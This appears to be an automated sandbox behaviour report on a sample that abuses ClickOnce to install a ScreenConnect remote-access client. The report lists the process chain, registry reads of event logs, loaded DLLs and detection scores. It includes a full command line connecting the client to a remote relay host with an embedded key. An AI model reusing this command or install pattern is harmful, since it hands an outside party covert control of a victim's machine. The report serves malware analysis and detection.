                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior

                  System Summary

                  barindex
                  Detected potential unwanted application
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_0076A5E50_2_0076A5E5
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761BD40_2_00761BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936ACD5B51_2_00007FF936ACD5B5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AF93691_2_00007FF936AF9369
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AE24711_2_00007FF936AE2471
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AC328D1_2_00007FF936AC328D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AFA1FD1_2_00007FF936AFA1FD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AE31ED1_2_00007FF936AE31ED
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936ABEFB61_2_00007FF936ABEFB6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936ABAEF51_2_00007FF936ABAEF5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AD5D9A1_2_00007FF936AD5D9A
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AEACDB1_2_00007FF936AEACDB
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936ACAE5F1_2_00007FF936ACAE5F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AEEB681_2_00007FF936AEEB68
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AC97681_2_00007FF936AC9768
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AD28801_2_00007FF936AD2880
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AB61781_2_00007FF936AB6178
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AD31111_2_00007FF936AD3111
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AB12111_2_00007FF936AB1211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936ABFA211_2_00007FF936ABFA21
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AC00D34_2_00007FF936AC00D3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936ABFE754_2_00007FF936ABFE75
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AC14104_2_00007FF936AC1410
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AC11D14_2_00007FF936AC11D1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936DAB1504_2_00007FF936DAB150
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal51.evad.winEXE@9/70@2/2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00761000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7040
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6820
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCommand line argument: dfshim0_2_00761000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeVirustotal: Detection: 17%
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeReversingLabs: Detection: 26%
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i=" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 860
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i=" "1"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
